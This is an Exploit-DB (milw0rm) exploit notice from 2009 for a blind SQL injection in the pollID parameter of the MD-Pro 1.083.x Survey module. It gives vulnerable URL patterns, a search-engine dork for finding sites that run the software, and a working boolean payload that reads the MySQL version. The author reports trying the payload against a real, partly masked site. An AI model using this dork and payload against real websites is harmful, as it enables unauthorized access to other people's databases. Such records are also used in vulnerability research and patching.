MD-Pro 1.083.x - Survey Module 'pollID' Blind SQL Injection

EDB-ID:

9021


Author:

XaDoS

Type:

webapps


Platform:

PHP

Date:

2009-06-25


[!]Information_schema:

[Product:  MDPro v 1.083.x               ]
[site:     www.maxdev.com                ]
[Vuln:     Blind $QL Injection (pollID)  ]
[Author:   XaDoS ~ thanks to S3rg3770    ]
[dork:     inurl:modules.php?op= "pollID"]
[          "Powered By MDPro"            ]

[~] Vuln:  (PollID)

http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]
or
http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]

[~] DeMo:

For example, if yuo want see the version of MySql write:

http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#

Like:

http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
so v => 5.0.0    (this site have 96 databases) :)

[~] Note:

If yuo want exploit for this vuln write it by yuorself. I'm really Busy.

thanks to s3rg3770 and warwolfz Crew


\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire

Have Fun :D

# milw0rm.com [2009-06-25]